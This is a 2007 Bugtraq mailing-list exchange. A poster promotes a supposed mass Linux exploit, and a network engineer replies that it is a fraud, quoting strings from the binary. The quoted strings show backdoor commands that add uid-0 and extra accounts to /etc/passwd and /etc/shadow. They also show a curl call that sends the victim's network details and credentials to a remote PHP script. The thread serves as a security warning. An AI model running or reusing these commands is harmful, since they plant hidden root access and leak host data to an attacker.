On Mon, 28 Aug 2007 [EMAIL PROTECTED] wrote:
Hello bugtraq,
Did somebody realize a new mass exploits is realeased to public, it's seems
work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap.
I've found this link somedays ago in a security forum, check this out
http://rufy.com/images/mass/
Looks like a fraud to me. Nice try.
[EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]@Root priviledge is needed - use your root user
OK!
[EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]@Rename your target list filename to
target.txt^@/etc/[EMAIL PROTECTED]@newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/[EMAIL PROTECTED]@[EMAIL PROTECTED]
toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/[EMAIL PROTECTED]@[EMAIL PROTECTED]@echo
newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/[EMAIL PROTECTED]@echo
toor:x:0:0:toor:/var:/bin/sh >> /etc/[EMAIL PROTECTED]@[EMAIL PROTECTED]@echo
newbie:x:10000:65534:toor:/var/tmp:/bin/sh >>
/etc/passwd^@/usr/bin/[EMAIL PROTECTED]@[EMAIL PROTECTED]@/usr/bin/curl -d
"user=newbie&pass=novice&target=$(ifconfig -a)"
http://www.trancefix.org/hell/save.php > /dev/null
2&>/dev/[EMAIL PROTECTED]@[EMAIL PROTECTED]@Trying to connect to %s port %d
----------------------------------------------------------------------
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
